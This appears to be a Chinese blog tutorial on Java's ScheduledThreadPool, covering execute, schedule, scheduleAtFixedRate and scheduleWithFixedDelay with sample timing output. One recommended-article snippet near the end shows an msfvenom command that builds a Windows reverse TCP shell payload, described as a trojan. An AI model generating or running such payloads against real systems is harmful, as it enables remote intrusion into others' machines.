ScheduledTheadPool线程池的使用
ScheduledTheadPool线程池的特点在于可以延迟执行任务,也可以周期性执行任务。
创建线程池
ScheduledExecutorService scheduled = Executors.newScheduledThreadPool(5);//参数为核心线程数,最大线程数无限大
定义一个简单的任务
class Work implements Runnable {
@Override
public void run() {
System.out.println(Thread.currentThread().getName() + " start time : "+new Date());
try {
Thread.sleep(5000);
} catch (InterruptedException e) {
e.printStackTrace();
}
System.out.println(Thread.currentThread().getName() + "end time : " + new Date());
}
}
执行任务的几种方法:
1、立即执行某任务
System.out.println("current time : "+new Date());
for (int i = 0; i < 2; i++) {
scheduled.execute(new Work());//待执行任务
}
输出结果:
current time : Mon Feb 26 11:31:14 CST 2018
pool-1-thread-2 start time : Mon Feb 26 11:31:14 CST 2018
pool-1-thread-1 start time : Mon Feb 26 11:31:14 CST 2018
pool-1-thread-1end time : Mon Feb 26 11:31:19 CST 2018
pool-1-thread-2end time : Mon Feb 26 11:31:19 CST 2018
结果分析:
程序先打印当前时间:'11:31:14',然后进行for循环,添加两个任务进入线程池,添加方式为立即执行,因此任务各自首先打印开始时间为'11:31:14',与最开始的当前时间相同。然后各自休眠5秒,再次打印时间'11:31:19'。
2、延迟执行
System.out.println("current time : "+new Date());
for (int i = 0; i < 2; i++) {
scheduled.schedule(new Work(), 3, TimeUnit.SECONDS);//待执行任务,延迟时间,延迟时间单位
}
输出结果
current time : Mon Feb 26 11:34:56 CST 2018
pool-1-thread-1 start time : Mon Feb 26 11:34:59 CST 2018
pool-1-thread-2 start time : Mon Feb 26 11:34:59 CST 2018
pool-1-thread-1end time : Mon Feb 26 11:35:04 CST 2018
pool-1-thread-2end time : Mon Feb 26 11:35:04 CST 2018
结果分析:
程序打印当前时间:'11:34:56',然后进行for循环,添加两个任务进线程池,添加方式为延迟执行,延迟时间为3秒。因此两个任务的开始时间均为'11:34:59',然后执行任务需要5秒,最后打印任务完成时间'11:35:04'。
3、延迟且周期性执行(周期时间从线程开始执行计算)
System.out.println("current time : "+new Date());
for (int i = 0; i < 2; i++) {
scheduled.scheduleAtFixedRate(new Work(), 3, 10, TimeUnit.SECONDS);//待执行时间,延迟时间,执行周期,时间单位
}
输出结果
current time : Mon Feb 26 11:48:51 CST 2018
pool-1-thread-1 start time : Mon Feb 26 11:48:54 CST 2018
pool-1-thread-2 start time : Mon Feb 26 11:48:54 CST 2018
pool-1-thread-1end time : Mon Feb 26 11:48:59 CST 2018
pool-1-thread-2end time : Mon Feb 26 11:48:59 CST 2018
pool-1-thread-1 start time : Mon Feb 26 11:49:04 CST 2018
pool-1-thread-2 start time : Mon Feb 26 11:49:04 CST 2018
pool-1-thread-2end time : Mon Feb 26 11:49:09 CST 2018
pool-1-thread-1end time : Mon Feb 26 11:49:09 CST 2018
pool-1-thread-4 start time : Mon Feb 26 11:49:14 CST 2018
pool-1-thread-3 start time : Mon Feb 26 11:49:14 CST 2018
pool-1-thread-4end time : Mon Feb 26 11:49:19 CST 2018
pool-1-thread-3end time : Mon Feb 26 11:49:19 CST 2018
结果分析:
程序打印当前时间:'11:48:51',然后进行for循环,添加两个任务进线程池,添加方式为延迟且周期性执行,延迟时间为3秒,周期时间为10秒。因此两个任务的第一次开始时间均为'11:48:54',然后执行任务需要5秒,打印第一次任务完成时间'11:48:59'。同时周期时间为任务的开始时间,即从'11:48:54'开始计算,到'11:49:04'开始第二次周期执行,因此第二次打印任务开始时间即为'11:49:04'。以此类推。
如果周期时间小于线程的执行时间,即线程已到第二个执行周期,但第一次任务仍未执行完成,则会进行等待,直到第一次任务完成,然后立即执行第二次任务。
4、延迟且周期性执行(周期时间从线程执行完成计算)
System.out.println("current time : "+new Date());
for (int i = 0; i < 2; i++) {
scheduled.scheduleWithFixedDelay(new Work(), 3, 10, TimeUnit.SECONDS);//待执行时间,延迟时间,执行周期,时间单位
}
输出结果
current time : Mon Feb 26 12:00:55 CST 2018
pool-1-thread-1 start time : Mon Feb 26 12:00:58 CST 2018
pool-1-thread-2 start time : Mon Feb 26 12:00:58 CST 2018
pool-1-thread-2end time : Mon Feb 26 12:01:03 CST 2018
pool-1-thread-1end time : Mon Feb 26 12:01:03 CST 2018
pool-1-thread-1 start time : Mon Feb 26 12:01:13 CST 2018
pool-1-thread-2 start time : Mon Feb 26 12:01:13 CST 2018
pool-1-thread-2end time : Mon Feb 26 12:01:18 CST 2018
pool-1-thread-1end time : Mon Feb 26 12:01:18 CST 2018
结果分析:
程序打印当前时间:'12:00:55',然后进行for循环,添加两个任务进线程池,添加方式为延迟且周期性执行,延迟时间为3秒,周期时间为10秒。因此两个任务的第一次开始时间均为'12:00:58',然后执行任务需要5秒,打印第一次任务完成时间'12:01:03'。同时周期时间的开始为任务执行完成时间,即从'12:01:03'开始计算,到'12:01:13'开始第二次周期执行,因此第二次打印任务开始时间即为'12:01:13'。以此类推。
ScheduledTheadPool线程池的使用的更多相关文章
- ThreadPoolExecutor线程池
为什么使用线程池: 1.创建/销毁线程伴随着系统开销,过于频繁的创建/销毁线程,会很大程度上影响处理效率. 2.线程并发数量过多,抢占系统资源从而导致阻塞. 3.对线程进行一些简单的管理. 在java ...
- 多线程爬坑之路-学习多线程需要来了解哪些东西?(concurrent并发包的数据结构和线程池,Locks锁,Atomic原子类)
前言:刚学习了一段机器学习,最近需要重构一个java项目,又赶过来看java.大多是线程代码,没办法,那时候总觉得多线程是个很难的部分很少用到,所以一直没下决定去啃,那些年留下的坑,总是得自己跳进去填 ...
- C#多线程之线程池篇3
在上一篇C#多线程之线程池篇2中,我们主要学习了线程池和并行度以及如何实现取消选项的相关知识.在这一篇中,我们主要学习如何使用等待句柄和超时.使用计时器和使用BackgroundWorker组件的相关 ...
- C#多线程之线程池篇2
在上一篇C#多线程之线程池篇1中,我们主要学习了如何在线程池中调用委托以及如何在线程池中执行异步操作,在这篇中,我们将学习线程池和并行度.实现取消选项的相关知识. 三.线程池和并行度 在这一小节中,我 ...
- C#多线程之线程池篇1
在C#多线程之线程池篇中,我们将学习多线程访问共享资源的一些通用的技术,我们将学习到以下知识点: 在线程池中调用委托 在线程池中执行异步操作 线程池和并行度 实现取消选项 使用等待句柄和超时 使用计时 ...
- NGINX引入线程池 性能提升9倍
1. 引言 正如我们所知,NGINX采用了异步.事件驱动的方法来处理连接.这种处理方式无需(像使用传统架构的服务器一样)为每个请求创建额外的专用进程或者线程,而是在一个工作进程中处理多个连接和请求.为 ...
- Java线程池解析
Java的一大优势是能完成多线程任务,对线程的封装和调度非常好,那么它又是如何实现的呢? jdk的包下和线程相关类的类图. 从上面可以看出Java的线程池主的实现类主要有两个类ThreadPoolEx ...
- Android线程管理之ExecutorService线程池
前言: 上篇学习了线程Thread的使用,今天来学习一下线程池ExecutorService. 线程管理相关文章地址: Android线程管理之Thread使用总结 Android线程管理之Execu ...
- Android线程管理之ThreadPoolExecutor自定义线程池
前言: 上篇主要介绍了使用线程池的好处以及ExecutorService接口,然后学习了通过Executors工厂类生成满足不同需求的简单线程池,但是有时候我们需要相对复杂的线程池的时候就需要我们自己 ...
随机推荐
- nodejs中安卓端的编码如何转换为中文
借助一些模块来转换,比如,html-entities Github var Entities = require('html-entities').XmlEntities; entities = ne ...
- C# dataGridView 如何选中整行?
this.dataGridView1.SelectionMode =DataGridViewSelectionMode.FullRowSelect; dataGridView1即你的dataGridV ...
- 《大话设计模式》c++实现 之策略模式
一.UML图 二.概念 策略模式:他定义了算法家族,分别封装起来,让他们之间可以互相替换,此模式让算法的变化,不会影响到使用算法的客户. 三.优点 (1)策略模式是一种定义一系列算法的方法,从 ...
- Msfvenom木马使用及TheFatRat工具
msfvenom –platform windows -p windows/x64/shell/reverse_tcp LHOST=192.168.168.111 LPORT=3333 EXITFUN ...
- html5-section元素
<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8&qu ...
- 互联网级监控系统必备-时序数据库之Influxdb技术
时间序列数据库,简称时序数据库,Time Series Database,一个全新的领域,最大的特点就是每个条数据都带有Time列. 时序数据库到底能用到什么业务场景,答案是:监控系统. Baidu一 ...
- Python 学习记录之----模块 paramiko
paramiko 一.安装 pip3.5 install paramiko pip3.5 install pycrypto # pycrypto,由于 paramiko 模块内部依赖pycrypto, ...
- Python: 字典dict: zip()
problem: 怎样在数据字典中执行一些计算操作(比如求最小值.最大值.排序等等)? answer: eg1: 考虑下面的股票名和价格映射字典: prices = {'ACME': 45.23,'A ...
- MyEclipse使用Ant打包项目
本章主要介绍如何使用ant打包发布项目. ant 是一个将软件编译.测试.部署等步骤联系在一起加以自动化的一个工具,大多用于Java环境中的软件开发.在实际软件开发中,有很多地方可以用到ant. 优点 ...
- 配置开发环境2——eclipse配置
纯手动配置eclipse, Eclipse配置 配置工作空间的编码方式 General—Workspace:改成Other:UTF-8 配置property的编码方式 配置maven Window — ...